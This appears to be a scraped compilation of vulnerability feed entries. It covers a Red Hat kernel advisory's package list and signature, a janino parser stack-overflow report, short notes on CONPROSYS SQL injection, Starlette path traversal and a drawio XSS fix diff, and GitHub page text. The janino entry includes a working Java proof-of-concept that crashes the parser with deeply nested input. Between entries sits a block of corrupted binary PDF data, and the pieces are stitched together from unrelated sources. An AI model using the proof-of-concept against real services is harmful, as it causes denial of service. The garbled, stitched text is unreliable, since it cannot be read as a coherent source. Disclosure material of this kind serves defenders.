kernel-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-core-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-cross-headers-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-core-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-devel-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-modules-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-devel-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-headers-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-modules-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-modules-extra-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-tools-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-tools-libs-4.18.0-372.57.1.el8_6.aarch64.rpm  
perf-4.18.0-372.57.1.el8_6.aarch64.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
python3-perf-4.18.0-372.57.1.el8_6.aarch64.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-372.57.1.el8_6.noarch.rpm  
kernel-doc-4.18.0-372.57.1.el8_6.noarch.rpm

ppc64le:  
bpftool-4.18.0-372.57.1.el8_6.ppc64le.rpm  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-core-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-cross-headers-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-core-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-devel-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-modules-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-devel-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-headers-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-modules-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-modules-extra-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-tools-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-tools-libs-4.18.0-372.57.1.el8_6.ppc64le.rpm  
perf-4.18.0-372.57.1.el8_6.ppc64le.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
python3-perf-4.18.0-372.57.1.el8_6.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm

s390x:  
bpftool-4.18.0-372.57.1.el8_6.s390x.rpm  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-core-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-cross-headers-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-core-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-devel-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-modules-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-modules-extra-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-devel-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-headers-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-modules-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-modules-extra-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-tools-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-core-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-372.57.1.el8_6.s390x.rpm  
perf-4.18.0-372.57.1.el8_6.s390x.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
python3-perf-4.18.0-372.57.1.el8_6.s390x.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm

x86_64:  
bpftool-4.18.0-372.57.1.el8_6.x86_64.rpm  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-core-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-cross-headers-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-core-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-devel-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-modules-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-devel-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-headers-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-modules-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-modules-extra-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-tools-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-tools-libs-4.18.0-372.57.1.el8_6.x86_64.rpm  
perf-4.18.0-372.57.1.el8_6.x86_64.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
python3-perf-4.18.0-372.57.1.el8_6.x86_64.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64:  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-tools-libs-devel-4.18.0-372.57.1.el8_6.aarch64.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm

ppc64le:  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-tools-libs-devel-4.18.0-372.57.1.el8_6.ppc64le.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm

x86_64:  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-tools-libs-devel-4.18.0-372.57.1.el8_6.x86_64.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/cve/CVE-2022-39188  
https://access.redhat.com/security/cve/CVE-2022-42703  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZHeU+9zjgjWX9erEAQi2oQ/8CjXD50RTu/f05Wy6hXQ1WKi0RpVyivwS  
/ggH5Eda75T/a8L1zpjzr1lf00M/W3Xer1fOdUQ1j7s47ftaHz497iAZ0QquYL3T  
e8yuqTI8sHviWNVJdhqAweHHO7Q+P7a70E+Ey6LzPuKg1ytrb3qqFgZZogotMIeq  
pYHcd6LAiRnMejg8LbRRkCFBPOi+S9bGSyzVnnKQoaEt/4zpN12iLZOTOTlfWEYO  
bqzXs8vMZ41UEfqmv7IYpoE/pnRnLb77ZDNVyOUqYtEn0ny8dVn101+SNsitHnLs  
z5q6UNlcl+F3zOBvGLCraO03TqXLjKiwg6stYcny8/S6Z83FDLi7YTD87MC0XVH8  
NoaTF1c1Xsx9+lxo2+G6RU6+t2GC6AkBTO292WmGRNihTZioSZrGe/HiIXkEkyyL  
MrEevB1udkbFudeFl5UJIKT1PnVq4BHtIb5BqGMCNKIhqP5MiPiZ94D0l7qy2EzA  
OCqMrIdrucnBW88gBdtxaShniimeAxzjSVHqPZN5K1Z/o0DEg6n0zmwFCpQKgSRl  
/kSC14Bx/78OTL6+oGNd1/0z0ZcqhF1reqtvg9fJAT9uZaXcUjDtIbTsuoRbA2Db  
d3HUCdWkAFypfX0M1M77mSvhuXO1KW02ITFq18P5eLSH7qkn1boRe6lj8D2nOfO+  
Xg8eHVf7+44=  
=SiSH  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3388-01

janino 3.1.9 and earlier are subject to denial of service (DOS) attacks when using the expression evaluator.guess parameter name method. If the parser runs on user-supplied input, an attacker could supply content that causes the parser to crash due to a stack overflow.

**Description**

janino 3.1.9 and earlier are subject to denial of service (DOS) attacks when using the expression evaluator.guess parameter name method. If the parser runs on user-supplied input, an attacker could supply content that causes the parser to crash due to a stack overflow.

**Error Log**

        at org.codehaus.janino.TokenStreamImpl.produceToken(TokenStreamImpl.java:55)
	at org.codehaus.janino.TokenStreamImpl.peek(TokenStreamImpl.java:94)
	at org.codehaus.janino.TokenStreamImpl.peek(TokenStreamImpl.java:114)
	at org.codehaus.janino.Parser.peek(Parser.java:3781)
	at org.codehaus.janino.Parser.parsePrimary(Parser.java:3203)
	at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
	at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
	at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
	at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
	at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
	at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
	at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
	at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
	at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
	at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
	at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
	at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
	at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
	at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
	at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
	at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
	at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
	at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
	at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
	at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
	at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
	at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
	at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
	at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
	at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
	at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
	at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
	at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
	at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
	at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
	at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
	at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
	at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
	at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
	at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
	at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
	at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
	at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
	at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
	at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
	at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
	at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
	at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
	at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
	at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
	at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
	at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
	at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
	at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
	at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
	at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
	at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
	at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
	at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
	at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
	at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
	at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
	at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
	at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
	at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
	at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
	at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
	at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
	at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
	at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
	at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
	at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
	at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
	at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
	at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
	at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
	at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
	at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
	at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
	at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
	at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
	at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
	at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
	at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
	at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
	at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
	at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
	at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
	at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
	at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
	at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
	at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
	at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
	at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
	at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
	at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
	at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
	at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
	at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
	at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
	at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
	at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
	at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
	at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
	at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
	at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
	at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
	at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
	at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
	at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
	at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
	at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)

**Reproducing**

    // PoC.java
    import org.codehaus.commons.compiler.CompileException;
    import org.codehaus.janino.ExpressionEvaluator;
    import org.codehaus.janino.Scanner;
    
    import java.io.IOException;
    import java.io.StringReader;
    
    public class PoC{
        public static void test(String data) {
            try{
                ExpressionEvaluator.guessParameterNames(new Scanner(null, new StringReader(data)));
            }
            catch(IOException | CompileException | AssertionError e){
            }
    
        }
    
        public static String _nestedDoc(int nesting, String open, String close, String content) {
            StringBuilder sb = new StringBuilder(nesting * (open.length() + close.length()));
            for (int i = 0; i < nesting; ++i) {
                sb.append(open);
                if ((i & 31) == 0) {
                    sb.append("\n");
                }
            }
            sb.append("\n").append(content).append("\n");
            for (int i = 0; i < nesting; ++i) {
                sb.append(close);
                if ((i & 31) == 0) {
                    sb.append("\n");
                }
            }
            return sb.toString();
        }
    
        public static void main(String[] args) {
            String TOO_DEEP_DOC = _nestedDoc(3000, "( ", ") ", "t");
    //        String TOO_DEEP_JSON = NestUtil._nestedDoc(1000, "{ ", "} ", "t");
            test(TOO_DEEP_DOC);
        }
    }

CVE-2023-33546: A Stack overflow error · Issue #201 · janino-compiler/janino

SQL injection vulnerability exists in the CONPROSYS HMI System (CHS) versions prior to 3.5.3. A user who can access the affected product with an administrative privilege may execute an arbitrary SQL command via specially crafted input to the query setting page.

%PDF-1.7 %���� 208 0 obj <> endobj 242 0 obj <>/Encrypt 209 0 R/Filter/FlateDecode/ID\[<4CC9DB30F105B54D839A8846EE4C0E36>\]/Index\[208 60\]/Info 207 0 R/Length 143/Prev 646036/Root 210 0 R/Size 268/Type/XRef/W\[1 3 1\]>>stream h�bbd\`\`\`b\`\`.�L�@$�AɠY"Y���t��V�UfO�,�\`q���\`�s0"�$�l�2�D�:A�;؜�JF�,c� ɔ����$��,Rø{���l$&� �Q"���������� �\_�� endstream endobj startxref 0 %%EOF 267 0 obj <>stream ���6��LbH ���P�ܼ~x�8�x�0|vi�E�7�tFo�U4pE@��2M�H�h�R�@�W�vaU�;W�Q͚�&���ҧl�P�s�羨X��{=���=�&$R ��S�����-c�{2��d���4��߇y�����$�%��N0d��t0<!����SZ���� 1��^�mR:4ϛ��Q��� C\]t{��9P�.�����Y���S;t���ZQ��Cےɟ�t�� endstream endobj 209 0 obj <>>>/Filter/Standard/Length 256/O(u0����G\\r�p�c�b$kp���R~��qP\`�UK\]1|�\]����e�o�)/OE(��Ƈ��v���F+<;\\\\YG�p\\nh��In&9)/P -1324/Perms(DĔ�y�{H3�Mxv�)/R 6/StmF/StdCF/StrF/StdCF/U(�g���+��s�4vP�Dk���|ZSH̓\[��j��a�\[��z�f)/UE(-���ֱ�jh5�:���\\)pVN&~��j��)/V 5>> endobj 210 0 obj <�)/MarkInfo<>/Metadata 14 0 R/OpenAction 211 0 R/PageLayout/SinglePage/Pages 206 0 R/StructTreeRoot 23 0 R/Type/Catalog>> endobj 211 0 obj <> endobj 212 0 obj <>/Font<>/ProcSet\[/PDF/Text/ImageC\]/XObject<>>>/Rotate 0/StructParents 0/Type/Page>> endobj 213 0 obj <>stream 1��3�ԤjE�o�?�8� �m���5�\]�+��ˋ�zo��+�s㼏},�s}i\*Fi��P�ҽ����W�3Z3�5��Q\`l���b�Me�i<���>G�P3u0���AU�X�P��1%���S�gY ��3|Q}\\�?����(�-�ؾ��%7A���BKN�i���k@K��:Js�x�� �d�BT�ϬSr����,��6���kb$���-e���b�S�hO|�O��Fą1�aab��&� �\`g\]U�w�Ü�����E����xS�Y.�\]u�C �JB�$Mb�Xc����� g�UuA�\[���˯ڜ�M1�c��bƐ��7��M�+��5��(式 �"��~�cc�QpK�<�@23A\_xo� v�/�0���p�;�F\*,�Q�M�񅔦/U$NoR\]���W'���8R��pL\*���p�h-��&�QLM�.��0{��'�B�;�&%�{Z���U����I�h�h��E��C�D.��}����$l� @��V�Y�հ�3m�\`��َ?���֟�2��1�PW��GĖ��j� l�槽g�\\�6�ڿ���,YBQA>�u���2.k O?Q+��\]�m����W�!�Zi���n����1b���43��ő�Dh�\*�j�:9��E�Nu,�\\�F�5$t�p��v�y�׬�lAeBP8���;{��e�rpق�,b6�hx˚CM��!f7���|K3�@���%bZ/�?���!WzH:�8"����\*�q"�BM� �U �%g�萍F\_��Nl��Cz��E���$�D���pv�p�d��n���BO�t,:k�N�y9���j�-�^�i�jHͧ0Pfa�ܸJ�#a�N�D�g�\\� �е��R�V�ڸ�w���%��u�4O?�p�H�1�lk�?��X���S���\_pJYo�Z�lvϴ, �x���1���b�+\`���Pbip�x�lΡ�;+���R���ı��7ͣ�,����1)\*�'��F�����+l�䫧� ����O�+Ͳ� �@��D/A��bT�qDk���hBF���kz�h50�ww�7�d�����&��O �/��+^ٕ�N�:237�Vc}�\[9?iΙ%@:�W��Hj������� C���YU�c��e2ag��e��7i�^qS �>��ɴ&��6l��Y� 8��W��Z�D��k�>����?�� endstream endobj 214 0 obj <>stream �Rg��(u��h��r\`�ٶi��tBT��O�paѩ�f!o�6�'a׺�}�=���ޒ�B���x\_3��\*g# ��4�aYo�jM+������7@�Lw�"p��j���������n�.��#��Җke����F홀�8}��Df\`?!�j)y9.���ih\`������\[9�$\*TM(#"���:vf\_�mh'�."t\`�k�5qnlH\*ӄcF�����F���>���,�l�\[y�4��1��?�&6w�8\]�U� ��#�3Q�RI�L�I�㡌�/n�����h/1���3�xKhũpi��cCb��� I�T0U.�#�0���������"��k���5TOB����qP#�:��&��+gͽ�܃�<o�&8��M���lF��2c�(�!{���՜bD�֘:���h�8�%jH�l���ʖ�=cXX�(�R��r��<{R~r��2Z.��Μ \]jBCly/�-���.�Qc�w)1کꚈ��v�rT���\\m��1|RG,-�l�\\e��u}D endstream endobj 215 0 obj <>stream ��@��7Ā�N�3��鱗����QzJ/k��YF��L�26�!?���vvY�kˬ\[�^Z���JG���3x��L�7��8#��UM'�֎N���O��#}�0�O�}��ҕ@Ŏ{�5(/�^�D�����j�q{yP�7��qr+���(/-k1=�)�%B�e.R�T���A��CH� ͤ��0�G��5�Cx,a�<�a tc\`����3X����p�e��6�SE���6e�G~�-��%7e�K��\`

CVE-2023-29154

Directory traversal vulnerability in Starlette versions 0.13.5 and later and prior to 0.27.0 allows a remote unauthenticated attacker to view files in a web service which was built using Starlette.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

*   Notifications
*   Fork 749

*   Code
*   Issues 28
*   Pull requests 17
*   Discussions
*   Actions
*   Security
*   Insights

1.  Releases
2.  0.27.0

· 5 commits to master since this release

0c4b68a

This commit was created on GitHub.com and signed with GitHub’s **verified signature**.

This release fixes a path traversal vulnerability in StaticFiles. You can view the full security advisory:  
GHSA-v5gw-mw7f-84px

**Added**

*   Minify JSON websocket data via send_json #2128

**Fixed**

*   Replace commonprefix by commonpath on StaticFiles 1797de4.
*   Convert ImportErrors into ModuleNotFoundError #2135.
*   Correct the RuntimeError message content in websockets #2141.

**Full Changelog**: 0.26.1...0.27.0

JonasKs, Kludex, gh640, alexted, i0tool5, strongbugman, adamzr, Molkree, and fmeneghetti reacted with thumbs up emoji alexted reacted with laugh emoji alexted and i0tool5 reacted with hooray emoji alexted and v3ss0n reacted with heart emoji alexted, i0tool5, and leynier reacted with rocket emoji alexted and nilsfast reacted with eyes emoji

12 people reacted

CVE-2023-29159: Release Version 0.27.0 · encode/starlette

Cross-site Scripting (XSS) - Stored in GitHub repository jgraph/drawio prior to 21.2.8.

Expand Up @@ -1885,7 +1885,7 @@ GraphViewer.prototype.showLightbox = function(editable, closable, target) /\*\* \* Adds the given array of stencils to avoid dynamic loading of shapes. \*/ GraphViewer.prototype.showLocalLightbox \= function() GraphViewer.prototype.showLocalLightbox \= function(container) { var backdrop \= document.createElement('div');  
Expand Down Expand Up @@ -1921,6 +1921,17 @@ GraphViewer.prototype.showLocalLightbox = function() urlParams\['tags'\] \= '{}'; }  
if (container != null) { try { var toolbarConfig \= JSON.parse(decodeURIComponent(urlParams\['toolbar-config'\] || '{}')); toolbarConfig.noCloseBtn \= true; urlParams\['toolbar-config'\] \= encodeURIComponent(JSON.stringify(toolbarConfig)); } catch (e) {} }  
// PostMessage not working and Permission denied for opened access in IE9- if (document.documentMode \== null || document.documentMode \>= 10) { Expand Down Expand Up @@ -1961,20 +1972,23 @@ GraphViewer.prototype.showLocalLightbox = function()  
ui.destroy \= function() { mxEvent.removeListener(document.documentElement, 'keydown', keydownHandler); document.body.removeChild(backdrop); document.body.removeChild(closeImg); document.body.style.overflow \= overflow; GraphViewer.resizeSensorEnabled \= true;  
destroy.apply(this, arguments); if (container \== null) { mxEvent.removeListener(document.documentElement, 'keydown', keydownHandler); document.body.removeChild(backdrop); document.body.removeChild(closeImg); document.body.style.overflow \= overflow; GraphViewer.resizeSensorEnabled \= true;  
destroy.apply(this, arguments); } };  
var graph \= ui.editor.graph; var lightbox \= graph.container; lightbox.style.overflow \= 'hidden';  
if (this.lightboxChrome) if (this.lightboxChrome && container \== null) { lightbox.style.border \= '1px solid #c0c0c0'; lightbox.style.margin \= '40px'; Expand Down Expand Up @@ -2049,8 +2063,16 @@ GraphViewer.prototype.showLocalLightbox = function() lightbox.style.zIndex \= this.lightboxZIndex; closeImg.style.zIndex \= this.lightboxZIndex;  
